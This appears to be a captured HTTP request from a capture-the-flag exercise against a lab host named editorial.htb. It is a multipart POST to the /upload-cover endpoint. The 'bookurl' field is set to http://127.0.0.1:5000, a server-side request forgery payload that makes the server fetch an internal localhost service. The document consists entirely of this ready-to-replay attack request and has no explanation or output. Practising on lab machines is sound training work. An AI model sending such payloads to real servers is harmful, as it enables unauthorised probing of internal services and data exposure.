POST /upload-cover HTTP/1.1
Host: editorial.htb
Content-Length: 305
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4sG5ro4zgTRwZZA2
Accept: */*
Origin: http://editorial.htb
Referer: http://editorial.htb/upload
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundary4sG5ro4zgTRwZZA2
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000
------WebKitFormBoundary4sG5ro4zgTRwZZA2
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary4sG5ro4zgTRwZZA2--
